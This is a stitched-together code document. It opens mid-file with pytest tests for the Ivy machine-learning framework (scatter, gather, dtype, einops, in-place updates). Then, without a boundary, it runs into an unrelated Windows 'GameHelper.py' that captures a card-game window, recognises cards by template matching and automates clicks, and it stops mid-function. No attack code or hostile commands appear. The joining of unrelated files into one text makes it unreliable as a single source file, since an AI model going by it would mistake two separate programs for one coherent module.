inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
ret = ivy.scatter_flat(inds, upd, size, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (size,)
if red == 'replace':
return
# value test
assert np.allclose(call(ivy.scatter_flat, inds, upd, size, red, dev),
np.asarray(ivy.functional.backends.numpy.scatter_flat(ivy.to_numpy(inds), ivy.to_numpy(upd), size, red)))
# compilation test
if call in [helpers.torch_call]:
# global torch_scatter var not supported when scripting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.scatter_flat)
# scatter_nd
@pytest.mark.parametrize(
"inds_n_upd_n_shape", [([[4], [3], [1], [7]], [9, 10, 11, 12], [8]), ([[0, 1, 2]], [1], [3, 3, 3]),
([[0], [2]], [[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]]], [4, 4, 4])])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_nd(inds_n_upd_n_shape, red, dtype, tensor_fn, dev, call):
# smoke test
if (red == 'sum' or red == 'min' or red == 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
if red == 'replace' and call is not helpers.mx_call:
# mxnet is the only backend which supports the replace reduction
pytest.skip()
inds, upd, shape = inds_n_upd_n_shape
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
ret = ivy.scatter_nd(inds, upd, shape, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
if red == 'replace':
return
# value test
assert np.allclose(call(ivy.scatter_nd, inds, upd, shape, red, dev),
np.asarray(ivy.functional.backends.numpy.scatter_nd(ivy.to_numpy(inds), ivy.to_numpy(upd), shape, red)))
# compilation test
if call in [helpers.torch_call]:
# global torch_scatter var not supported when scripting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.scatter_nd)
# gather
@pytest.mark.parametrize(
"prms_n_inds_n_axis", [([9, 8, 7, 6, 5, 4, 3, 2, 1, 0], [0, 4, 7], 0),
([[1, 2], [3, 4]], [[0, 0], [1, 0]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather(prms_n_inds_n_axis, dtype, tensor_fn, dev, call):
# smoke test
prms, inds, axis = prms_n_inds_n_axis
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather(prms, inds, axis, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape
# value test
assert np.allclose(call(ivy.gather, prms, inds, axis, dev),
np.asarray(ivy.functional.backends.numpy.gather(ivy.to_numpy(prms), ivy.to_numpy(inds), axis)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.gather)
# gather_nd
@pytest.mark.parametrize(
"prms_n_inds", [([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[0, 1], [1, 0]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1]], [[1, 0]]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1, 0]], [[1, 0, 1]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather_nd(prms_n_inds, dtype, tensor_fn, dev, call):
# smoke test
prms, inds = prms_n_inds
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather_nd(prms, inds, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape[:-1] + prms.shape[inds.shape[-1]:]
# value test
assert np.allclose(call(ivy.gather_nd, prms, inds, dev),
np.asarray(ivy.functional.backends.numpy.gather_nd(ivy.to_numpy(prms), ivy.to_numpy(inds))))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.gather_nd)
# linear_resample
@pytest.mark.parametrize(
"x_n_samples_n_axis_n_y_true", [([[10., 9., 8.]], 9, -1, [[10., 9.75, 9.5, 9.25, 9., 8.75, 8.5, 8.25, 8.]]),
([[[10., 9.], [8., 7.]]], 5, -2,
[[[10., 9.], [9.5, 8.5], [9., 8.], [8.5, 7.5], [8., 7.]]]),
([[[10., 9.], [8., 7.]]], 5, -1,
[[[10., 9.75, 9.5, 9.25, 9.], [8., 7.75, 7.5, 7.25, 7.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linear_resample(x_n_samples_n_axis_n_y_true, dtype, tensor_fn, dev, call):
# smoke test
x, samples, axis, y_true = x_n_samples_n_axis_n_y_true
x = tensor_fn(x, dtype, dev)
ret = ivy.linear_resample(x, samples, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = list(x.shape)
num_x_dims = len(x_shape)
axis = axis % num_x_dims
x_pre_shape = x_shape[0:axis]
num_vals = x.shape[axis]
x_post_shape = x_shape[axis+1:]
assert list(ret.shape) == x_pre_shape + [samples] + x_post_shape
# value test
y_true = np.array(y_true)
y = call(ivy.linear_resample, x, samples, axis)
assert np.allclose(y, y_true)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.linear_resample)
# exists
@pytest.mark.parametrize(
"x", [[1.], None, [[10., 9., 8.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_exists(x, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
ret = ivy.exists(x)
# type test
assert isinstance(ret, bool)
# value test
y_true = x is not None
assert ret == y_true
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.exists)
# default
@pytest.mark.parametrize(
"x_n_dv", [([1.], [2.]), (None, [2.]), ([[10., 9., 8.]], [2.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_default(x_n_dv, dtype, tensor_fn, dev, call):
x, dv = x_n_dv
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
dv = tensor_fn(dv, dtype, dev)
ret = ivy.default(x, dv)
# type test
assert ivy.is_array(ret)
# value test
y_true = ivy.to_numpy(x if x is not None else dv)
assert np.allclose(call(ivy.default, x, dv), y_true)
# compilation test
if call is helpers.torch_call:
# try-except blocks are not jit compilable in pytorch
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.default)
# dtype
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype(x, dtype, tensor_fn, dev, call):
# smoke test
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.dtype(x)
# type test
assert isinstance(ret, ivy.Dtype)
# dtype_to_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_to_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dtype_as_str = ivy.dtype(x, as_str=True)
dtype_to_str = ivy.dtype_to_str(ivy.dtype(x))
# type test
assert isinstance(dtype_as_str, str)
assert isinstance(dtype_to_str, str)
# value test
assert dtype_to_str == dtype_as_str
# dtype_from_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_from_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dt0 = ivy.dtype_from_str(ivy.dtype(x, as_str=True))
dt1 = ivy.dtype(x)
# value test
assert dt0 is dt1
def test_cache_fn(dev, call):
def func():
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn()
ret0_again = cached_fn()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)()
ret0_again = ivy.cache_fn(func)()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_cache_fn_with_args(dev, call):
def func(_):
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn(0)
ret0_again = cached_fn(0)
ret1 = cached_fn(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)(0)
ret0_again = ivy.cache_fn(func)(0)
ret1 = ivy.cache_fn(func)(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_framework_setting_with_threading(dev, wrapped_mode, call):
if wrapped_mode:
        # ToDo: get this test passing in wrapped mode
pytest.skip()
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def thread_fn():
ivy.set_framework('numpy')
x_ = np.array([0., 1., 2.])
for _ in range(2000):
try:
ivy.reduce_mean(x_)
except TypeError:
return False
ivy.unset_framework()
return True
# get original framework string and array
fws = ivy.current_framework_str()
x = ivy.array([0., 1., 2.])
    # start numpy loop thread; capture the worker's return value since Thread.join() always returns None
    thread_res = []
    thread = threading.Thread(target=lambda: thread_res.append(thread_fn()))
    thread.start()
# start local original framework loop
ivy.set_framework(fws)
for _ in range(2000):
ivy.reduce_mean(x)
ivy.unset_framework()
    thread.join()
    assert not thread_res[0]
def test_framework_setting_with_multiprocessing(dev, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def worker_fn(out_queue):
ivy.set_framework('numpy')
x_ = np.array([0., 1., 2.])
for _ in range(1000):
try:
ivy.reduce_mean(x_)
except TypeError:
out_queue.put(False)
return
ivy.unset_framework()
out_queue.put(True)
# get original framework string and array
fws = ivy.current_framework_str()
x = ivy.array([0., 1., 2.])
# start numpy loop thread
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(target=worker_fn, args=(output_queue,))
worker.start()
# start local original framework loop
ivy.set_framework(fws)
for _ in range(1000):
ivy.reduce_mean(x)
ivy.unset_framework()
worker.join()
assert output_queue.get_nowait()
def test_explicit_ivy_framework_handles(dev, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
# store original framework string and unset
fw_str = ivy.current_framework_str()
ivy.unset_framework()
# set with explicit handle caught
ivy_exp = ivy.get_framework(fw_str)
assert ivy_exp.current_framework_str() == fw_str
# assert backend implemented function is accessible
assert 'array' in ivy_exp.__dict__
assert callable(ivy_exp.array)
# assert joint implemented function is also accessible
assert 'cache_fn' in ivy_exp.__dict__
assert callable(ivy_exp.cache_fn)
# set global ivy to numpy
ivy.set_framework('numpy')
# assert the explicit handle is still unchanged
assert ivy.current_framework_str() == 'numpy'
assert ivy_exp.current_framework_str() == fw_str
# unset global ivy from numpy
ivy.unset_framework()
def test_class_ivy_handles(dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: get this test passing
pytest.skip()
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
class ArrayGen:
def __init__(self, ivyh):
self._ivy = ivyh
def get_array(self):
return self._ivy.array([0., 1., 2.])
# create instance
ag = ArrayGen(ivy.get_framework())
# create array from array generator
x = ag.get_array()
# verify this is not a numpy array
assert not isinstance(x, np.ndarray)
# change global framework to numpy
ivy.set_framework('numpy')
# create another array from array generator
x = ag.get_array()
# verify this is not still a numpy array
assert not isinstance(x, np.ndarray)
# einops_rearrange
@pytest.mark.parametrize(
"x_n_pattern_n_newx", [([[0., 1., 2., 3.]], 'b n -> n b', [[0.], [1.], [2.], [3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_rearrange(x_n_pattern_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, new_x = x_n_pattern_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_rearrange(x, pattern)
true_ret = einops.rearrange(ivy.to_native(x), pattern)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# compilation test
if call is helpers.torch_call:
# torch jit cannot compile **args
pytest.skip()
if not ivy.array_mode():
helpers.assert_compilable(ivy.einops_rearrange)
# einops_reduce
@pytest.mark.parametrize(
"x_n_pattern_n_red_n_newx", [([[0., 1., 2., 3.]], 'b n -> b', 'mean', [1.5])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_reduce(x_n_pattern_n_red_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, reduction, new_x = x_n_pattern_n_red_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_reduce(x, pattern, reduction)
true_ret = einops.reduce(ivy.to_native(x), pattern, reduction)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# compilation test
if call is helpers.torch_call:
# torch jit cannot compile **args
pytest.skip()
if not ivy.array_mode():
helpers.assert_compilable(ivy.einops_reduce)
# einops_repeat
@pytest.mark.parametrize(
"x_n_pattern_n_al_n_newx", [([[0., 1., 2., 3.]], 'b n -> b n c', {'c': 2},
[[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_repeat(x_n_pattern_n_al_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, axes_lengths, new_x = x_n_pattern_n_al_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_repeat(x, pattern, **axes_lengths)
true_ret = einops.repeat(ivy.to_native(x), pattern, **axes_lengths)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# compilation test
if call is helpers.torch_call:
# torch jit cannot compile **args
pytest.skip()
if not ivy.array_mode():
helpers.assert_compilable(ivy.einops_repeat)
# profiler
def test_profiler(dev, call):
# ToDo: find way to prevent this test from hanging when run alongside other tests in parallel
# log dir
this_dir = os.path.dirname(os.path.realpath(__file__))
log_dir = os.path.join(this_dir, '../log')
# with statement
with ivy.Profiler(log_dir):
a = ivy.ones([10])
b = ivy.zeros([10])
a + b
if call is helpers.mx_call:
time.sleep(1) # required by MXNet for some reason
# start and stop methods
profiler = ivy.Profiler(log_dir)
profiler.start()
a = ivy.ones([10])
b = ivy.zeros([10])
a + b
profiler.stop()
if call is helpers.mx_call:
time.sleep(1) # required by MXNet for some reason
# container types
def test_container_types(dev, call):
cont_types = ivy.container_types()
assert isinstance(cont_types, list)
for cont_type in cont_types:
assert hasattr(cont_type, 'keys')
assert hasattr(cont_type, 'values')
assert hasattr(cont_type, 'items')
def test_inplace_arrays_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch']:
assert ivy.inplace_arrays_supported()
elif cur_fw in ['jax', 'tensorflow']:
assert not ivy.inplace_arrays_supported()
else:
raise Exception('Unrecognized framework')
def test_inplace_variables_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch', 'tensorflow']:
assert ivy.inplace_variables_supported()
elif cur_fw in ['jax']:
assert not ivy.inplace_variables_supported()
else:
raise Exception('Unrecognized framework')
@pytest.mark.parametrize(
"x_n_new", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_update(x_n_new, tensor_fn, dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: add support for inplace updates in wrapped mode
pytest.skip()
x_orig, new_val = x_n_new
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, 'float32', dev)
new_val = tensor_fn(new_val, 'float32', dev)
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
(tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
x = ivy.inplace_update(x_orig, new_val)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(x), ivy.to_numpy(new_val))
return
pytest.skip()
@pytest.mark.parametrize(
"x_n_dec", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_decrement(x_n_dec, tensor_fn, dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: add support for inplace decrements in wrapped mode
pytest.skip()
x_orig, dec = x_n_dec
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, 'float32', dev)
dec = tensor_fn(dec, 'float32', dev)
new_val = x_orig - dec
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
(tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
x = ivy.inplace_decrement(x_orig, dec)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
return
pytest.skip()
@pytest.mark.parametrize(
"x_n_inc", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_increment(x_n_inc, tensor_fn, dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: add support for inplace increments in wrapped mode
pytest.skip()
x_orig, inc = x_n_inc
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, 'float32', dev)
inc = tensor_fn(inc, 'float32', dev)
new_val = x_orig + inc
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
(tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
x = ivy.inplace_increment(x_orig, inc)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
return
pytest.skip()
# GameHelper.py
# -*- coding: utf-8 -*-
# Created by: Vincentzyx
import win32gui
import win32ui
import win32api
from ctypes import windll
from PIL import Image
import cv2
import pyautogui
import matplotlib.pyplot as plt
import numpy as np
import os
import time
import threading
from win32con import WM_LBUTTONDOWN, MK_LBUTTON, WM_LBUTTONUP, WM_MOUSEMOVE
import multiprocessing as mp
from PyQt5 import QtGui, QtWidgets, QtCore
from PyQt5.QtCore import QTime, QEventLoop
Pics = {}
ReqQueue = mp.Queue()
ResultQueue = mp.Queue()
Processes = []
def GetSingleCardQueue(reqQ, resQ, Pics):
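    # worker-process loop: pull card recognition requests from reqQ and push any successful matches onto resQ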
while True:
while not reqQ.empty():
image, i, sx, sy, sw, sh, checkSelect = reqQ.get()
result = GetSingleCard(image, i, sx, sy, sw, sh, checkSelect, Pics)
del image
if result is not None:
resQ.put(result)
time.sleep(0.01)
def ShowImg(image):
plt.imshow(image)
plt.show()
def DrawRectWithText(image, rect, text):
img = cv2.cvtColor(np.asarray(image), cv2.COLOR_RGB2BGR)
x, y, w, h = rect
img2 = cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)
img2 = cv2.putText(img2, text, (x, y + 20), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 0, 255), 2)
return Image.fromarray(cv2.cvtColor(img2, cv2.COLOR_BGR2RGB))
def CompareCard(card):
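    # sort key: map a card rank character to its ascending order ("3" lowest, "D" the red joker highest)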
order = {"3": 0, "4": 1, "5": 2, "6": 3, "7": 4, "8": 5, "9": 6, "T": 7, "J": 8, "Q": 9, "K": 10, "A": 11, "2": 12,
"X": 13, "D": 14}
return order[card]
def CompareCardInfo(card):
order = {"3": 0, "4": 1, "5": 2, "6": 3, "7": 4, "8": 5, "9": 6, "T": 7, "J": 8, "Q": 9, "K": 10, "A": 11, "2": 12,
"X": 13, "D": 14}
return order[card[0]]
def CompareCards(cards1, cards2):
if len(cards1) != len(cards2):
return False
cards1.sort(key=CompareCard)
cards2.sort(key=CompareCard)
for i in range(0, len(cards1)):
if cards1[i] != cards2[i]:
return False
return True
def GetListDifference(l1, l2):
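    # multiset difference in both directions: returns (elements only in l1, elements only in l2)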
temp1 = []
temp1.extend(l1)
temp2 = []
temp2.extend(l2)
for i in l2:
if i in temp1:
temp1.remove(i)
for i in l1:
if i in temp2:
temp2.remove(i)
return temp1, temp2
def FindImage(fromImage, template, threshold=0.9):
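    # template-match `template` against `fromImage` and return the top-left points of every match above `threshold`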
w, h, _ = template.shape
fromImage = cv2.cvtColor(np.asarray(fromImage), cv2.COLOR_RGB2BGR)
res = cv2.matchTemplate(fromImage, template, cv2.TM_CCOEFF_NORMED)
loc = np.where(res >= threshold)
points = []
for pt in zip(*loc[::-1]):
points.append(pt)
return points
def GetSingleCard(image, i, sx, sy, sw, sh, checkSelect, Pics):
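    # identify the i-th hand card by template matching inside its slot (cards are laid out at a 50 px stride);
    # returns (rank, (center_x, center_y)) or None if no template matches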
cardSearchFrom = 0
AllCardsNC = ['rD', 'bX', '2', 'A', 'K', 'Q', 'J', 'T', '9', '8', '7', '6', '5', '4', '3']
currCard = ""
ci = cardSearchFrom
    while ci < len(AllCardsNC):
        if "r" in AllCardsNC[ci] or "b" in AllCardsNC[ci]:
            # joker templates already carry their colour prefix ("rD" / "bX")
            result = pyautogui.locate(needleImage=Pics["m" + AllCardsNC[ci]], haystackImage=image,
                                      region=(sx + 50 * i, sy - checkSelect * 25, sw, sh), confidence=0.9)
            if result is not None:
                cardPos = (sx + 50 * i + sw // 2, sy - checkSelect * 25 + sh // 2)
                currCard = AllCardsNC[ci][1]
                return currCard, cardPos
        else:
            # ordinary ranks exist as a red and a black template; try both
            for card_type in ["r", "b"]:
                result = pyautogui.locate(needleImage=Pics["m" + card_type + AllCardsNC[ci]],
                                          haystackImage=image,
                                          region=(sx + 50 * i, sy - checkSelect * 25, sw, sh), confidence=0.9)
                if result is not None:
                    cardPos = (sx + 50 * i + sw // 2, sy - checkSelect * 25 + sh // 2)
                    currCard = AllCardsNC[ci]
                    return currCard, cardPos
        if ci == len(AllCardsNC) - 1 and checkSelect == 0:
            # nothing matched at the normal height: rescan once at the raised (selected card) position
            checkSelect = 1
            ci = cardSearchFrom - 1
        ci += 1
    return None
def RunThreads():
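    # load all card template images from the pics directory and spawn 20 recognition worker processes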
for file in os.listdir("pics"):
info = file.split(".")
if info[1] == "png":
tmpImage = Image.open("pics/" + file)
Pics.update({info[0]: tmpImage})
for ti in range(20):
p = mp.Process(target=GetSingleCardQueue, args=(ReqQueue, ResultQueue, Pics))
p.start()
def LocateOnImage(image, template, region=None, confidence=0.9):
    # crop to the (x, y, w, h) region of interest before template matching
    if region is not None:
        x, y, w, h = region
        image = image[y:y + h, x:x + w, :]
    res = cv2.matchTemplate(image, template, cv2.TM_CCOEFF_NORMED)
    # return True on a match and None otherwise, so callers can keep using "is not None" checks
    if (res >= confidence).any():
        return True
    return None
class GameHelper:
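    # wraps window capture and template matching against the game client window ("Hlddz")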
def __init__(self):
self.ScreenZoomRate = 1.25
self.Pics = {}
self.PicsCV = {}
self.Handle = win32gui.FindWindow("Hlddz", None)
self.Interrupt = False
self.RealRate = (1796, 1047)
for file in os.listdir("./pics"):
info = file.split(".")
if info[1] == "png":
tmpImage = Image.open("./pics/" + file)
imgCv = cv2.imread("./pics/" + file)
self.Pics.update({info[0]: tmpImage})
self.PicsCV.update({info[0]: imgCv})
def Screenshot(self, region=None): # -> (im, (left, top))
hwnd = self.Handle
# im = Image.open(r"C:\Users\q9294\Desktop\llc.png")
# im = im.resize((1796, 1047))
# return im, (0,0)
left, top, right, bot = win32gui.GetWindowRect(hwnd)
width = right - left
height = bot - top
self.RealRate = (width, height)
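        # compensate for Windows display scaling so the captured bitmap matches the window's logical size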
width = int(width / self.ScreenZoomRate)
height = int(height / self.ScreenZoomRate)
hwndDC = win32gui.GetWindowDC(hwnd)
mfcDC = win32ui.CreateDCFromHandle(hwndDC)
saveDC = mfcDC.CreateCompatibleDC()
saveBitMap = win32ui.CreateBitmap()
saveBitMap.CreateCompatibleBitmap(mfcDC, width, height)
saveDC.SelectObject(saveBitMap)
result = windll.user32.PrintWindow(hwnd, saveDC.GetSafeHdc(), 0)
bmpinfo = saveBitMap.GetInfo()
bmpstr = saveBitMap.GetBitmapBits(True)
im = Image.frombuffer(
"RGB",
(bmpinfo['bmWidth'], bmpinfo['bmHeight']),
bmpstr, 'raw', 'BGRX', 0, 1)
win32gui.DeleteObject(saveBitMap.GetHandle())
saveDC.DeleteDC()
mfcDC.DeleteDC()
win32gui.ReleaseDC(hwnd, hwndDC)
im = im.resize((1798, 1047))
if region is not None:
im = im.crop((region[0], region[1], region[0] + region[2], region[1] + region[3]))
if result:
return im, (left, top)
else:
return None, (0, 0)
def LocateOnScreen(self, templateName, region, confidence=0.9):
image, _ = self.Screenshot()
return pyautogui.locate(needleImage=self.Pics[templateName],
haystackImage=image, region=region, confidence=confidence)
def ClickOnImage(self, templateName, region=None, confidence=0.9):
image, _ = self.Screenshot()
result = pyautogui.locate(needleImage=self.Pics[templateName], haystackImage=image, confidence=confidence, region=region)
if result is not None:
self.LeftClick((result[0], result[1]))
def GetCardsState(self, image):
st = time.time()
imgCv = cv2.cvtColor(np.asarray(image), cv2.COLOR_RGB2BGR)
states = []
cardStartPos = pyautogui.locate(needleImage=self.Pics["card_edge"], haystackImage=image,
region=(313, 747, 1144, 200), confidence=0.85)
if cardStartPos is None:
return []
sx = cardStartPos[0] + 10
cardSearchFrom = 0
sy, sw, sh = 770, 50, 55
for i in range(0, 20):
haveWhite = LocateOnImage(imgCv, self.PicsCV["card_white"], region=(sx + 50 * i, sy, 60, 60), confidence=0.9)
if haveWhite is not None:
break
result = LocateOnImage(imgCv, self.PicsCV["card_upper_edge"], region=(sx + 50 * i, 720, sw, 50), confidence=0.9)
checkSelect = 0
if result is not None:
result = LocateOnImage(imgCv, self.PicsCV["card_overlap"], region=(sx + 50 * i, 750, sw, 50), confidence=0.85)
if result is None:
checkSelect = 1
states.append(checkSelect)
print("GetStates Costs ", time.time()-st)
return states
def GetCards(self, image):
st = time.time()
imgCv = cv2.cvtColor(np.asarray(image), cv2.COLOR_RGB2BGR)
cardStartPos = pyautogui.locate(needleImage=self.Pics["card_edge"], haystackImage=image,
region=(313, 747, 1144, 200), confidence=0.85)
if cardStartPos is None:
return [],[]
sx = cardStartPos[0] + 10
AllCardsNC = ['rD', 'bX', '2', 'A', 'K', 'Q', 'J', 'T', '9', '8', '7', '6', '5', '4', '3']
hand_cards = []
select_map = []
cardSearchFrom = 0
sy, sw, sh = 770, 50, 55
for i in range(0, 20):
# haveWhite = pyautogui.locate(needleImage=self.Pics["card_white"], haystackImage=image,
# region=(sx + 50 * i, sy, 60, 60), confidence=0.8)
